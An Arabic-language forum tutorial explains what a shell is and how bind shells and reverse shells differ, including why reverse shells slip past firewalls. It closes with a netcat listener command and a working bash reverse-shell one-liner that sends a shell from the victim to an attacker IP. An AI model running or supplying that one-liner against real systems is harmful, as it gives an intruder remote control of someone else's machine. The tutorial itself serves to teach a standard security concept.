x32x01
  • بواسطة x32x01 ||
إذا كنت تستخدم الميتاسبوليت بشكل اكيد ستلاحظ وجود استغلال بأسم reverse shell او reverse tcp لكن ماذا يعني هذا ؟!
للتحكم في نظام ما ، يهدف المهاجم عادةً إلى الحصول على وصول تفاعلي للصدفة shell او الصدفة وهي بأختصار برنامج يفسر أوامرنا ويعطي الأوامر المكتوبة لنظام التشغيل. يعمل كواجهة بين المستخدم ونظام التشغيل. يأخذ مدخلات من لوحة المفاتيح ويعطيها لنظام التشغيل ، ويتيح لك موجة الاوامر كتابة الأوامر والتفاعل مع shell
بعض الامثلة عليها :
Code:
Windows PowerShell
Windows Command Prompt or CMD
bash
sh
dash
Korn
من خلال هذا الوصول ، يمكنهم محاولة رفع امتيازاتهم للحصول على التحكم الكامل في نظام التشغيل. ومع ذلك ، فإن معظم الأنظمة وراء جدران الحماية ويكون من المستحيل إجراء اتصالات shell المباشرة عن بعد. إحدى الطرق المستخدمة للتحايل على هذا القيد هي بأستخدام القذائف العكسية reverse shell.
ثانيا هناك فرق بين reverse sell و bind shell ///
bind shell :
في Bind shell ، يقوم المهاجم بتشغيل خدمة على الكمبيوتر المستهدف ، والتي يمكن للمهاجم الاتصال بها حيث يمكن للمهاجم الاتصال بالكمبيوتر المستهدف وتنفيذ الأوامر على الكمبيوتر المستهدف. ولعمل ذلك يجب أن يكون لدى المهاجم عنوان ال IP الخاص بالضحية للوصول إلى الكمبيوتر المستهدف.
reverse sell:
الاتصال العكسي عبارة عن إعداد ، حيث يجب على المهاجم أولاً بدء تشغيل الخادم على جهازه ، بينما سيتعين على الجهاز المستهدف لعب دور العميل و يتصل بالخادم الذي هو في الاصل جهاز المهاجم و بعد الاتصال الناجح ، يمكن للمهاجم بعبارة اخري عكس الاتصال وارسال الاوامر للجهاز المستهدف و لإطلاق قذيفة عكسية او اتصال عكسي ، لا يحتاج المهاجم إلى معرفة عنوان IP للضحية للوصول إلى الكمبيوتر المستهدف.
ويمكن تلخيص الفارق كالتالي :
تعمل Bind Shells على تشغيل المستمع على جهاز الضحية ويتصل المهاجم بالمستمع من أجل الوصول عن بُعد إلى النظام المستهدف بينما في reverse sell ، يقوم المهاجم بتشغيل المستمع على جهازه هو ويتصل الهدف بالمهاجم حتى يتمكن هذا المهاجم من الوصول إلى النظام المستهدف (جهاز الضحية).
في Bind shell ، يجد المهاجم منفذًا مفتوحًا port على جهاز الضحية ثم يحاول ربط جهازة من خلال ذلك المنفذ بينما في reverse sell ، يفتح المهاجم منفذه الخاص port. حتى تتمكن تلك الضحية من الاتصال بهذا المنفذ من أجل اتصال ناجح .
في bind shell يجب أن يعرف المهاجم عنوان IP الضحية قبل إطلاق ذلك الهجوم بينما في reverse shell لا يحتاج المهاجم إلى معرفة عنوان IP للضحية ، لأنه سيتصل بمنفذنا المفتوح.
في bind shell ، يكون المستمع listener قيد التشغيل على جهاز الضحية ويتصل المهاجم به بينما في reverse sell تجد انه عكس Bind Shell ، في reverse sell ، المستمع قيد التشغيل على جهاز المهاجم وجهاز الضحية هو الذي يتصل به.
يفشل Bind Shell أحيانًا ، لأن جدران الحماية الحديثة لا تسمح للأجانب بالاتصال بالمنافذ المفتوحة معني ذلك ان جدران الحماية تمنع اي اتصالات قادمة علي اي منفذ مفتوح بينما يمكن لـ Reverse Shell تجاوز مشكلات جدار الحماية لأن هذا الجهاز المستهدف هو من يحاول الاتصال بالمهاجم ، وهذا لا يكلف جدار الحماية عناء فحص الحزم.
في الاخير مثال بسيط علي هجوم reverse shell بأستخدام اداة netcat
Code:
ncat -l -p 1337
هنا نقوم بضبط الجهاز علي وضع الاستماع من خلال الحرف -l والمنفذ -p مع رقم المنفذ 1337
في ذلك الامر نقوم بتشغيل جهازنا مخادم يستمع الي اي اتصال قادم
بعدها نقوم بكتابة ذلك الامر في جهاز الضحية وليكن نظام لينكس
Code:
/bin/bash -i >& /dev/tcp/10.10.17.1/1337 0>&1
 

المشاركات المتشابهة

x32x01
الردود
0
المشاهدات
9
x32x01
x32x01
x32x01
الردود
0
المشاهدات
23
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
55
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
16
x32x01
x32x01
x32x01
الردود
0
المشاهدات
25
x32x01
x32x01
الوسوم : الوسوم
bind shell reverse shell reverse tcp

الدخول أو التسجيل السريع

نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى

المواضيع
1,463
المشاركات
1,627
أعضاء أكتب كود
186
أخر عضو
2024nacer
عودة
أعلى